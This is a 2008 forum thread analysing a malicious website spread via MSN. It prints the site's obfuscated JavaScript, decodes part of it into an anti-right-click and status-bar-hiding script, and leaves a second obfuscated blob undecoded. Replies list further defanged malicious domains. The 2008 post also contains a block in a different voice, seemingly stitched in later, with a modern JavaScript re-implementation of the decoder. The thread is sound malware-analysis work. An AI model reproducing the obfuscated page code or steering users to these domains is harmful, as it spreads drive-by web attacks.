Author Topic: MSN Spreaded MalWebsite  (Read 4374 times)

May 25, 2008, 06:55:19 am
Evilcry

Hi,

This morning I received a link from an MSN contact of mine; she was offline.

Code:
hxxp://checkdiz.info

At first analysis with Malzilla it reveals three other links:

Code:
hxxp://checkdiz.info/indexx.php
hxxp://www.cpashield.com/abuse.html
hxxp://checkdiz.info/counter.php

indexx.php has a level of indirection to:

Code:
hxxp://fileho5t.info/indexxx.php

counter.php leads to:

Code:
hxxp://www.ipcounter.de/stats.php?u=50076309

And finally the most interesting one, cpashield.com/abuse.html, contains obfuscated JavaScript code:

Code:
<!--
jL0="0ucoc\\MIM",yU90="Iu\{\{\{\%\%ovf0N";0.1261199,nB73="0.7082915",yU90='\|\:T2B\ m\(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,\@\#dcWU\}\%LE\&nG0\~ekzh\)',jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';function lW4(uO49){"0u\%N\{\{I\{\\",l=uO49.length;'0k\+IBI\r0c',w='';while(l--)"0ucooc\;\{\{",o=jL0.indexOf(uO49.charAt(l)),'\~k\)0\~cc\+YX0c',w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;"0uoN0M\%\{\{",jL0=jL0.substring(1)+jL0.charAt(0),document.write(w);'0kZ\r\)Z\r\r\|'};lW4("2nW\(m\!L\`yD\<b\|Db\^\rJDiDnW\(m\!L\$\)l8t\r8\]\]U\;mV\ P\-W\|S\^\<LdDyy\?9V\|\<WLm\-\<\`XPS\ \?9\(\^L\|\(\<\`VDyn\^\@\;V\|\<WLm\-\<\`XSPS\ \?9P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\rXPS\;n\^L\>mS\^\-\|L\ KXSPS\ \?Ke\]xx\?\@\;XSPS\ \?\;\@P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\r\<\^\)\`w\|\<WLm\-\<\ K\(\^L\|\(\<\`VDyn\^K\?\;V\|\<WLm\-\<\`X\<PS\ \^\?9mV\ P\-W\|S\^\<LdyDo\^\(n\"\"\)m\<P\-\)dnmP\^\{D\(\?9mV\ \^d\)\}mW\}R\rU\?\(\^L\|\(\<\`VDyn\^\;\@\@\;mV\ P\-W\|S\^\<LdyDo\^\(n\?9P\-W\|S\^\<LdWD\!L\|\(\^\:i\^\<Ln\ \:i\^\<Ld3fr\*\:Mf4H\?\;P\-W\|S\^\<Ld\-\<S\-\|n\^P\-\)\<\rX\<PS\;\@\^yn\^9P\-W\|S\^\<Ld\-\<S\-\|n\^\|\!\rX\<PS\;\@\;S1Ux\rtEN\=\;\{fGE\r6EN8\;V\|\<WLm\-\<\`XP\)n\ \?9\)m\<P\-\)dnLDL\|n\`\r\`K\`K\;n\^L\>mS\^\-\|L\ KXP\)n\ \?KeUxx\?\;\@\;XP\)n\ \?\;mM\]N\r6xtU\;m48E\r\=8E8\;V\|\<WLm\-\<\`XPPn\ \?9mV\ P\-W\|S\^\<LdDyy\?9P\-W\|S\^\<Ld\-\<n\^y\^WLnLD\(L\rV\|\<WLm\-\<\`\ \?9\(\^L\|\(\<\`VDyn\^\@\;n\^L\>mS\^\-\|L\ KXPPn\ \?KeGxx\?\@\@\;XPPn\ \?\;b\+E\r8ENG\;mHUG\rNG\=G\;jltt\rtEN6\;yMGx\r\=G\=6\;p1tN\r8\]G\]\;jfN8\r\]\]\]x\;\~kx\rUG\=\]\;\;XymW\^\<n\^PXL\-X\rKF\^L\^\(\`\nDyyK\;2AnW\(m\!L\$")//-->

Which, decoded, becomes:

Code:
wX42=4881;   // the bare numeric assignments throughout appear to be filler from the obfuscator
// IE (document.all): disable the right-click context menu and re-apply the hook every 800 ms
if(document.all){
function _dm(){return false};
function _mdm(){
document.oncontextmenu=_dm;
setTimeout("_mdm()",800)};
_mdm();
}

document.oncontextmenu=new Function("return false");
// Netscape 4 (document.layers) / Mozilla (window.sidebar): swallow every mouse button except the left one
function _ndm(e){
if(document.layers||window.sidebar){if(e.which!=1)return false;
 }
};

if(document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=_ndm;
 }

else {
document.onmouseup=_ndm;
};

mQ10=2593;bO75=6594;

// Blank the status bar every 100 ms so link targets are not shown on hover
function _dws(){
window.status = " ";
setTimeout("_dws()",100);
};

_dws();
iD89=6021;
iW45=3454;
// IE: disable text selection, re-applied every 700 ms
function _dds(){if(document.all){
document.onselectstart=function (){return false};
setTimeout("_dds()",700)}};_dds();
gJ5=4597;
iN17=9737;
zX22=2596;
lD70=3736;
kQ29=4878;
zO94=8880;
qY0=1738;
;_licensed_to_="Peter Call";

There is also another piece of obfuscated code:

Code:
<script language="javascript">lW4("MGN\#\%tCJYS\?d\ \'SJ\@\`\:8\%SDXwwr\r\%wwNtNSKit6\:S\~k0St\!fQ\n\,d\,3Qf\'wwY2DSD\?ddH\>wwAAAkA\rk3\!\[wtswz\?d\ \'\~wNtNwz\?d\ \'\~Xd\!fQ\n\,d\,3Qf\'kWdWDO\=m\=mMGXXS\%\!pfdpWS3QSoH\!Sc\+qSc00\|SI\>c0\>0cSJ6SXXO\=m\=mM\?d\ \'O\=mSSSM\?pfWO\=mSSSSSSMd\,d\'pO\=mSSSSSSSSS\=mSSSSSSMwd\,d\'pO\=mSSSSSSM\ pdfSQf\ pRDxY2Ysot\#sDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSSSSM\ pdfSQf\ pRD\$\#s6ottYsDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSMw\?pfWO\=m\=mSSSMg3WlSg\[43\'3\!RDP\-\-\-\-\-\-DSdpzdRDP000000DS\'\,QjRDP0000\-\-DSE\'\,QjRDPI000I0DSf\'\,QjRDP\-\-0000DO\=m\=mSM4pQdp\!OMgOJ\'pf\npS\!pH3\!dSfQlS\np\!E\,4pSE\,3\'fd\,3Q\nSd3\>SMoS\?\!p\-RD\ f\,\'d3\>fg\.\npv4Hf\n\?\,p\'Wk43\ DOfg\.\npv4Hf\n\?\,p\'Wk43\ MwgOMwfOMw4pQdp\!O\=m\=mSSSMwg3WlO\=mMw\?d\ \'O\=m")

Regards,
Evilcry

Deep Root Never Freezes - Tolkien
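The lW4() routine in the post is a plain substitution table (jL0 maps to yU90) whose table is rotated by one character after every call. The following is an added re-implementation, not code from the post, that decodes such strings without letting document.write() run and shows why the two lW4() calls above must be decoded in order; the alphabets and sample strings are constructed, not the post's real keys.

```javascript
// Added example, not code from the thread: a side-effect-free rebuild of the
// post's lW4() decoder. Alphabets and strings here are constructed (14 chars);
// the real post uses two ~95-character alphabets.

// Mirrors lW4(): every input character found in `table` (the jL0 alphabet) is
// replaced by the character at the same index in plainAlphabet (yU90);
// anything not in the table passes through. After each call the table is
// rotated left by one, so the thread's second lW4() call decodes under a
// shifted alphabet. Walking from the end and prepending, as the original
// does, yields the same string as a forward pass.
function makeCodec(cipherAlphabet, plainAlphabet) {
  let table = cipherAlphabet;
  const rotate = () => { table = table.substring(1) + table.charAt(0); };
  return {
    decode(encoded) {
      let w = "";
      for (let l = encoded.length - 1; l >= 0; l--) {
        const o = table.indexOf(encoded.charAt(l));
        w = (o === -1 ? encoded.charAt(l) : plainAlphabet.charAt(o)) + w;
      }
      rotate();
      return w;
    },
    // Inverse under the same table state: useful for building test vectors
    // that confirm a decoder rebuild is faithful before trusting its output.
    encode(plain) {
      let w = "";
      for (let i = 0; i < plain.length; i++) {
        const o = plainAlphabet.indexOf(plain.charAt(i));
        w += o === -1 ? plain.charAt(i) : table.charAt(o);
      }
      rotate();
      return w;
    },
    currentTable() { return table; },
  };
}

// Constructed toy alphabets: same character set, different order.
const CIPHER_ALPHABET = "jihgfedcba /><";
const PLAIN_ALPHABET = "abcdefghij<>/ ";

// The same ciphertext decodes differently on the second call: the two lW4()
// calls in the post must be decoded in order, not independently.
function demo() {
  const dec = makeCodec(CIPHER_ALPHABET, PLAIN_ALPHABET);
  return [dec.decode("ijg"), dec.decode("ijg")]; // ["bad", "a c"]
}
```

To apply it to the real blobs, copy the two alphabet strings and each lW4() argument from the page source as JavaScript literals (so the backslash escapes are interpreted exactly as the browser would) and call decode() twice on one codec instance.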

May 25, 2008, 03:35:55 pm
Reply #1

JohnC


May 25, 2008, 04:09:29 pm
Reply #2

sowhat-x

Alive at the moment...
Quote
hxxp://very.c00l-stuff.com
hxxp://ch33se.info/indexxx.php
hxxp://m33tpoint.info/
hxxp://we1rd.info/indexxx.php
hxxp://m0bil3.info/indexxx.php
hxxp://mtracyruc.p4rtyp1cs.info/indexx.php

And it seems like they're also after MySpace accounts...
Quote
hxxp://maxcomments.com/